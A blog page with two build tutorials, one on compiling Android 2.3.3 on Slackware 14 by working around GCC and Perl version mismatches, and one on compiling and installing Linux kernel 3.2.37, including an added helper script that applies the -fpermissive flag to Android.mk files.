MicroMike: This blog is all about computer science, especially information security. Leave a comment to let me know how to make this blog better.
<h3>Compile Android 2.3.3 in Slackware 14</h3>
(posted 2013-01-21 by Anonymous)<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;"><b>I. Introduction:</b></span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">Recently I decided to change my Linux distro from Ubuntu to Slackware. The installation process is nice and smooth. After installing Slackware, I decided to download the Android 2.3.3 source and compile it myself. I had done it before on Ubuntu 10.04, so I told myself: how hard could it be? However, I was wrong; compiling Android on Slackware 14 is incredibly annoying. Most of the problems are caused by gcc and perl version mismatches. Some people might say: just downgrade/upgrade your gcc/perl version and it should be fine. I know that, but changing the gcc/perl version on your system might cause other problems, and I don't want to take that risk. (By the way, recompiling gcc is very time consuming on my computer. Hardware sucks.) </span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">Because of the above reasons, I decided to compile Android 2.3.3 without downgrading any tools, and to write the whole process down to remind myself how I did it.</span></div>
<div>
<br clear="none" /></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;"><b>II. Environment:</b></span></div>
<div>
<hr />
</div>
<div>
<ul>
<li><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">Linux Distro : Slackware 14 x86_64 (with multilib support)</span></li>
<li><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">gcc version : 4.7.1</span></li>
<li><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">make version : 3.82</span></li>
<li><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">perl version : 5.16</span></li>
<li><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">git version : 1.71</span></li>
<li><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">python version : 2.73</span></li>
</ul>
<div>
<hr />
</div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">Just a clean install of Slackware 14. </span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">As for multilib support, just check out the <a data-mce-href="http://alien.slackbook.org/dokuwiki/doku.php?id=slackware:multilib" href="http://alien.slackbook.org/dokuwiki/doku.php?id=slackware:multilib" shape="rect" target="_blank">Alien BOB wiki</a> and follow the instructions given there. </span></div>
<div>
<i><b><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">P.S. You should have more than 2GB of RAM or the build process may fail. </span></b></i></div>
<div>
<br clear="none" /></div>
<div>
<br clear="none" /></div>
</div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;"><b>III. Compiling Steps:</b></span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">This post mostly focuses on how to solve the version mismatch problems; therefore, I will not cover how I set up the build environment in this post. (Most libraries required to build Android are already installed by a clean Slackware 14 install.)</span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">After you follow the AOSP instructions and install all the necessary packages, it is time to type the make command. (I highly recommend using 'make -j1' instead of 'make -j8'.)</span></div>
<div>
<br clear="none" /></div>
<div>
<b><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">1. GCC version mismatch:</span></b></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">The following is an example of what this kind of error message looks like and the general solutions for this kind of problem. Figure 1 shows the error message. There are two ways to solve this kind of problem. </span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">The first one is to add "this->" in front of all the variables that appear in the error message. However, over the entire build, adding the this pointer in front of every reported variable becomes very annoying. </span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">The second method is to add the "-fpermissive" flag in the makefile; more precisely, add "-fpermissive" to LOCAL_CFLAGS in Android.mk. This method is more reasonable. </span></div>
<div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">During the whole build, there are several Android.mk files that need to be modified (adding the "-fpermissive" flag):</span></div>
<div>
<br clear="none" /></div>
<div>
<hr />
</div>
<div>
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">frameworks/base/tools/aapt/Android.mk</span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">frameworks/base/libs/utils/Android.mk</span><br />
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">external/srec/tools/grxmlcompile/Android.mk</span><br />
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">external/srec/tools/thirdparty/OpenFst/fst/lib/Android.mk</span><br />
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">external/srec/tools/make_cfst/Android.mk</span><br />
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">external/v8/Android.mksnapshot.mk</span><br />
<hr />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTO9LZpp0cacLUmPOsjhAFdXMor2_uYn5EwHp_mbI3q35oVY4PZkJFAP_9FKyUNRGStJO7lIfMDCH5s6Gfvx-Cb-EVoGz3alrNiFupofyYLAYliVRcIhTX3PKfgAyc0mvf_ZAla5HGBt8/s1600/android_first_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTO9LZpp0cacLUmPOsjhAFdXMor2_uYn5EwHp_mbI3q35oVY4PZkJFAP_9FKyUNRGStJO7lIfMDCH5s6Gfvx-Cb-EVoGz3alrNiFupofyYLAYliVRcIhTX3PKfgAyc0mvf_ZAla5HGBt8/s1600/android_first_1.png" /></a></div>
</div>
</div>
<div data-mce-style="text-align: center;" style="text-align: center;">
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">[figure 1] gcc version mismatch error message</span></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE-vBaWhFmPe8lUJMPzylDjgGwZ9WOCAumn6heP3E7bRl4H9yFnUUYB7hwKGSWrFrSzbPV7DODd7kDOSt10_VHEZqzrg7f0fWGgAkjXTTkH1bfpri_Yt99P69au3FMupHMGBAPwIJ0T-4/s1600/Android_first_solve.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE-vBaWhFmPe8lUJMPzylDjgGwZ9WOCAumn6heP3E7bRl4H9yFnUUYB7hwKGSWrFrSzbPV7DODd7kDOSt10_VHEZqzrg7f0fWGgAkjXTTkH1bfpri_Yt99P69au3FMupHMGBAPwIJ0T-4/s1600/Android_first_solve.png" /></a></div>
</div>
<div data-mce-style="text-align: center;" style="text-align: center;">
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">[Figure 2] Add "-fpermissive" after the LOCAL_CFLAGS in the Android.mk</span></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<br /></div>
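<div>To apply the "-fpermissive" change from a script rather than by hand, and to see which of the listed files still lack it, here is an added example (not code from the post or from AOSP; the function names are hypothetical, and it assumes POSIX sh, grep and awk):</div>

```shell
#!/bin/sh
# Added example, not code from the post or from AOSP: apply the post's fix
# (append -fpermissive to LOCAL_CFLAGS) to an Android.mk idempotently, and
# report which of the files the post lists still lack it. Function names
# are hypothetical. -fpermissive only downgrades GCC 4.7's errors to
# warnings, so it is applied per file, not to the whole tree.

# The Android.mk files the post says needed the flag for Android 2.3.3.
POST_FILES="frameworks/base/tools/aapt/Android.mk
frameworks/base/libs/utils/Android.mk
external/srec/tools/grxmlcompile/Android.mk
external/srec/tools/thirdparty/OpenFst/fst/lib/Android.mk
external/srec/tools/make_cfst/Android.mk
external/v8/Android.mksnapshot.mk"

# has_fpermissive FILE: 0 if the flag already appears anywhere in FILE
# (a coarse test, but enough to keep add_fpermissive idempotent).
has_fpermissive() {
    grep -q -- '-fpermissive' "$1"
}

# add_fpermissive FILE: append the flag to the first LOCAL_CFLAGS
# assignment, keeping a trailing "\" line continuation intact. If the file
# has no LOCAL_CFLAGS, add one after the first "include $(CLEAR_VARS)"
# (CLEAR_VARS resets every LOCAL_* variable, so an earlier line would be
# lost), or at the top when there is no CLEAR_VARS either.
add_fpermissive() {
    f=$1
    has_fpermissive "$f" && return 0
    if grep -Eq '^[[:space:]]*LOCAL_CFLAGS[[:space:]]*[:+]?=' "$f"; then
        awk '!done && /^[ \t]*LOCAL_CFLAGS[ \t]*[:+]?=/ {
                 if (sub(/[ \t]*\\$/, "")) $0 = $0 " -fpermissive \\"
                 else $0 = $0 " -fpermissive"
                 done = 1
             }
             { print }' "$f" > "$f.tmp"
    elif grep -q 'include[[:space:]]*\$(CLEAR_VARS)' "$f"; then
        awk '{ print }
             !done && /include[ \t]*\$\(CLEAR_VARS\)/ {
                 print "LOCAL_CFLAGS += -fpermissive"; done = 1
             }' "$f" > "$f.tmp"
    else
        { echo "LOCAL_CFLAGS += -fpermissive"; cat "$f"; } > "$f.tmp"
    fi
    mv "$f.tmp" "$f"
}

# report_missing ROOT [FILE...]: print each FILE (relative to ROOT, the
# Android source tree) that is absent or still lacks the flag. With no
# FILE arguments the post's list is checked.
report_missing() {
    root=$1; shift
    [ $# -eq 0 ] && set -- $POST_FILES
    for rel in "$@"; do
        if [ ! -f "$root/$rel" ]; then
            echo "$rel: missing file"
        elif ! has_fpermissive "$root/$rel"; then
            echo "$rel"
        fi
    done
}
```

Run `report_missing /path/to/android-2.3.3` before and after editing to confirm every listed file carries the flag.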
<div data-mce-style="text-align: left;" style="text-align: left;">
<b><span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">2. perl Switch module problem:</span></b></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">Switch.pm is deprecated in perl 5.16, so the solution is simple: patch "external/webkit/WebCore/dom/make_names.pl". Figures 4, 5 and 6 show the modifications to this file. </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Eh7vJLlsglyscM6k5BQrhFnz7_vDQGyedYJPm-RuiF9yd31WGvWq0lTyrOZHvp3ml5OzrzpMTFGfpLvxdckUj0yTVDJyWd6C4DYdHnxe_0Q3yGTLphUkeNRsY_nuT8tZMAXKImkJVN8/s1600/Android_second.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Eh7vJLlsglyscM6k5BQrhFnz7_vDQGyedYJPm-RuiF9yd31WGvWq0lTyrOZHvp3ml5OzrzpMTFGfpLvxdckUj0yTVDJyWd6C4DYdHnxe_0Q3yGTLphUkeNRsY_nuT8tZMAXKImkJVN8/s1600/Android_second.png" /></a></div>
</div>
<div data-mce-style="text-align: center;" style="text-align: center;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">[Figure 3] Can't locate Switch.pm</span></div>
<div data-mce-style="text-align: center;" style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip-SAcL2dOw8U7QF-TQlDp4NARcUZjeBA4b6KW5gy13_lE1nR-PARwh7bD56ayARjYTx0a-0EsGbgA0ovyvw65Xsz-qMouh5o7TWzv5Ev2K-2K1lv_m_DSrMZGAMYedukBoHPdQ9h7x1Q/s1600/Android_second_patch1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip-SAcL2dOw8U7QF-TQlDp4NARcUZjeBA4b6KW5gy13_lE1nR-PARwh7bD56ayARjYTx0a-0EsGbgA0ovyvw65Xsz-qMouh5o7TWzv5Ev2K-2K1lv_m_DSrMZGAMYedukBoHPdQ9h7x1Q/s1600/Android_second_patch1.png" /></a></div>
<span style="font-family: 'times new roman', times;">[Figure 4] comment out "use Switch"</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimoLzQzOFFVk5EMWOlkRssHX4M7IPHmiHKTFSnEV1mb5C8XUXklRWnpnHMNZsDPoMNwE0noAcP0De9DQK7kJ3IKGn3v0SJm3ScEhu9VYOmTpoxj3C9lcDpSXpdljuBzjHinFPsAJMr3fw/s1600/Android_second_pathc2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimoLzQzOFFVk5EMWOlkRssHX4M7IPHmiHKTFSnEV1mb5C8XUXklRWnpnHMNZsDPoMNwE0noAcP0De9DQK7kJ3IKGn3v0SJm3ScEhu9VYOmTpoxj3C9lcDpSXpdljuBzjHinFPsAJMr3fw/s1600/Android_second_pathc2.png" /></a></div>
<span style="font-family: 'times new roman', times;">[Figure 5] use if/else instead of switch/case</span></div>
<div data-mce-style="text-align: center;" style="text-align: center;">
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjakF30hfStU-6Qh62QAxqvXO2bACnR5JZcCOkJLzvCUuyTUDT6XTTNEPMzJI0nfipxbNXDQIdHpRDInodyUt4OYNv2p119yW7nZQH9d1t-D_GkfrIp2GdS-NJ9oS_W3dueZM4lRMSkGLE/s1600/Android_second_pathc3-2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjakF30hfStU-6Qh62QAxqvXO2bACnR5JZcCOkJLzvCUuyTUDT6XTTNEPMzJI0nfipxbNXDQIdHpRDInodyUt4OYNv2p119yW7nZQH9d1t-D_GkfrIp2GdS-NJ9oS_W3dueZM4lRMSkGLE/s640/Android_second_pathc3-2.png" height="84" width="640" /></a></div>
<br clear="none" /></div>
<div data-mce-style="text-align: center;" style="text-align: center;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">[Figure 6] delete the "-P" flag from preprocessor</span></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<b><span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">IV. Conclusion:</span></b></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">After the above steps, the build should complete and you can find the image files in the out directory.</span></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">I also made a diff file which you can download from here:</span><span data-mce-style="font-family: 'times new roman', times; font-size: medium; line-height: 1.428571em;" style="font-family: 'times new roman', times; font-size: small; line-height: 1.428571em;"> </span><span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;"><span data-mce-style="line-height: 1.428571em;" style="line-height: 1.428571em;"><a data-mce-href="http://pastebin.com/RCfB5irk" href="http://pastebin.com/RCfB5irk" shape="rect" target="_blank">http://pastebin.com/RCfB5irk</a></span></span></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;"><span data-mce-style="line-height: 1.428571em;" style="line-height: 1.428571em;">Just download the file and type:</span></span></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;"><span data-mce-style="line-height: 1.428571em;" style="line-height: 1.428571em;">patch -p1 < patch_file_name.patch</span></span></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;"><span data-mce-style="line-height: 1.428571em;" style="line-height: 1.428571em;">Enjoy :)</span></span></div>
<div>
<br clear="none" /></div>
<h3>Linux Kernel 1: How to Compile Linux Kernel</h3>
(posted 2013-01-21 by Anonymous)<div>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><strong>I. Introduction:</strong></span></div>
<div>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">This post is the first post on Linux kernel hacking. Before you can dig into the Linux kernel source, you should first learn how to build a kernel yourself.</span></div>
<div>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">There are many distributions out there, and I prefer to use Slackware 14, Gentoo or Debian (not Debian-based distros such as Ubuntu or Mint). The reason I recommend these distros is that most modern distributions have changed so much Linux code that it may confuse you while you are tracing the kernel source. </span></div>
<div>
<br clear="none" /></div>
<div>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><strong>II. Environment:</strong></span></div>
<ul>
<li><span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">Linux Distro: Slackware 14 x86_64</span></li>
<li><span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">kernel version: 3.2.37</span></li>
<li><span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">gcc version: 4.7.1</span></li>
</ul>
<div>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><strong>III. Contents:</strong></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong>1. pre-requirement:</strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">The first thing you should do is download the kernel source that you want to build. The kernel source can be found at: <a data-mce-href="http://www.kernel.org/pub/linux/kernel" href="http://www.kernel.org/pub/linux/kernel" shape="rect" target="_blank">http://www.kernel.org/pub/linux/kernel/</a>.</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">In my case, "linux-3.2.37.tar.bz2". Just extract the file and put it into the directory you want. I put the source code in "$HOME/kernel/".</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong>2. config: </strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">Before building the kernel, you have to configure it first. Type "make help" and you will see a list of options. In this part, we just focus on the config section.</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">The following are some options that are commonly used.</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<hr />
</div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<br /></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">config - Update current config utilising a line-oriented program</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">menuconfig - Update current config utilising a menu based program</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">xconfig - Update current config utilising a QT based front-end</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">gconfig - Update current config utilising a GTK based front-end</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">oldconfig - Update current config utilising a provided .config as base</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">localmodconfig - Update current config disabling modules not loaded</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">localyesconfig - Update current config converting local mods to core</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br clear="none" />
<hr />
</div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">The descriptions are self-explanatory, so I'm not going to explain them. Just a quick note: if you prefer a GUI, type "make xconfig" or "make gconfig", which gives you a graphical interface to configure the kernel. In my case I use "make localmodconfig", which sets the config file according to the modules loaded on your system.</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><br /></span>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">------------------------------------[update]---------------------------------------------------------</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"> You can also use "zcat /proc/config.gz > .config" if your previous kernel was built with the IKCONFIG and IKCONFIG_PROC options enabled. This copies the running kernel's configuration into your current kernel source. After that you can still type "make oldconfig" if you are building a newer kernel (the newer kernel may have some new features).</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">Thank you <a class="g-profile" href="http://plus.google.com/115790893258766250092" target="_blank">+Eric Garland</a>. :)</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong>3. build the kernel:</strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">If this is the first time you compile this kernel, type "make all -j8" to compile the kernel. The "make help" output tells us that "make all" builds the targets marked with *, and by default those are the kernel image and "modules". </span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">However, if you have compiled the kernel before and no new feature has been added to the config file, you can type "make bzImage -j8" instead (bzImage, the compressed image under arch/x86_64/boot, is the file installed in step 5; there is no "vmlinuz" make target). It will only build the kernel image and will not build the modules. </span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">If you have added a new module or edited the source code of a module, you can type "make modules -j8" to compile only the kernel modules.</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong>P.S. Compiling the Linux kernel may take some time depending on your hardware. (Get a cup of coffee or watch a movie :P)</strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong> 4. Install the modules:</strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">If this is the first time you build the Linux kernel, type "sudo make modules_install". If you haven't modified any kernel modules or added a new one in the config file, this step can be skipped.</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong>5. Install the kernel:</strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">Instead of typing "make install", I prefer to use the following commands.</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<hr />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><br clear="none" /></span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">sudo cp arch/x86_64/boot/bzImage /boot/vmlinuz-3.2.37</span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">sudo mkinitrd -c -k 3.2.37 -m ext4 -f ext4 -r /dev/sdaN -o /boot/initrd-3.2.37.img</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<hr />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><br clear="none" /></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">For more details about the mkinitrd command, type "man mkinitrd" or check out this link: <a href="http://mirrors.slackware.com/slackware/slackware-11.0/extra/linux-2.6.17.13/README.initrd" shape="rect">http://mirrors.slackware.com/slackware/slackware-11.0/extra/linux-2.6.17.13/README.initrd</a></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong>6. Update your bootloader:</strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">Since I'm using Slackware, whose default bootloader is lilo, I have to edit /etc/lilo.conf. After modifying /etc/lilo.conf, type "sudo lilo".</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong>7. Command Walk through:</strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<hr />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"> <span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">// if this is the first time you compile the kernel</span></span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">make mrproper; </span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">// if this is the first time
you compile the kernel or want to add some new features to your
kernel.</span> </span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">make
localmodconfig/menuconfig/xconfig/gconfig; </span></div>
<div data-mce-style="margin-left: 90px;" style="margin-left: 90px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">make all && make modules_install; // if this is the first time you compile the kernel or adding new stuff to the</span></div>
<div data-mce-style="margin-left: 90px;" style="margin-left: 90px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">make bzImage; // if you just changed the kernel source (bzImage is the image copied below; there is no vmlinuz target)</span></div>
<div data-mce-style="margin-left: 90px;" style="margin-left: 90px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">make modules && make modules_install; // if you have added a new module in the config file or modified module source code</span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">cp arch/x86_64/boot/bzImage /boot/vmlinuz-3.2.37</span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">mkinitrd -c -k 3.2.37 -m ext4 -f ext4 -r /dev/sda2</span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">-----update your bootloader----</span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">echo "done";</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<hr />
<br clear="none" /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><strong>IV Conclusion:</strong></span></div>
<div>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">This
is basically how to compile a linux kernel. I will talk about some more
configuration and some tools to help you trace the linux code. Happy
Hacking.</span></div>
